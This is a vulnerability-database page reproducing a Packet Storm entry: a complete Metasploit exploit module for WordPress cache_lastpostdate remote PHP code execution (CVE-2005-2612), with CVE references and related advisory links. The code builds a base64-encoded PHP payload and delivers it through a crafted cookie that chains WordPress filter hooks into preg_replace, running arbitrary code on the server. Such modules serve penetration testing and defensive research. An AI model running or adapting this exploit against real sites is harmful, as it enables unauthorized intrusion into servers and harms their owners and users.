Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:131000
HistoryMar 24, 2015 - 12:00 a.m.

WordPress cache_lastpostdate Arbitrary Code Execution

2015-03-2400:00:00
H D Moore
packetstormsecurity.com
21

0.127 Low

EPSS

Percentile

94.9%

JSON
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'WordPress cache_lastpostdate Arbitrary Code Execution',  
'Description' => %q{  
This module exploits an arbitrary PHP code execution flaw in the WordPress  
blogging software. This vulnerability is only present when the PHP 'register_globals'  
option is enabled (common for hosting providers). All versions of WordPress prior to  
1.5.1.3 are affected.  
},  
'Author' => [ 'str0ke <str0ke[at]milw0rm.com>', 'hdm' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2005-2612'],  
['OSVDB', '18672'],  
['BID', '14533'],  
['WPVDB', '6034']  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Compat' =>  
{  
'ConnectionType' => 'find'  
},  
'Space' => 512  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Aug 9 2005',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to WordPress", "/"]),  
], self.class)  
end  
  
def exploit  
  
enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"  
str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x')  
data =  
"wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+  
"wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+  
"cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+  
";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+  
"wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+  
"wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"  
  
# Trigger the command execution bug  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['URI']),  
'cookie' => data  
}, 25)  
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
else  
print_status("No response from the server")  
end  
end  
  
end  
`

Related

packetstorm 1
ubuntucve 1
patchstack 1
cve 1
debiancve 1
wpvulndb 1
nessus 1
packetstorm
packetstorm
WordPress cache_lastpostdate Arbitrary Code Execution
2009-10-30 00:00:00
ubuntucve
ubuntucve
CVE-2005-2612
2005-08-17 00:00:00
patchstack
patchstack
WordPress cache_lastpostdate - Arbitrary Code Execution
2010-07-03 00:00:00
cve
cve
CVE-2005-2612
2005-08-17 04:00:00
debiancve
debiancve
CVE-2005-2612
2005-08-17 04:00:00
wpvulndb
wpvulndb
Wordpress <= 1.5.1.3 - Remote Code Execution
2014-08-01 00:00:00
nessus
nessus
WordPress Cookie 'cache_lastpostdate' Parameter PHP Code Injection
2005-08-11 00:00:00

0.127 Low

EPSS

Percentile

94.9%

JSON
Related for PACKETSTORM:131000
packetstorm1ubuntucve1patchstack1cve1debiancve1wpvulndb1nessus1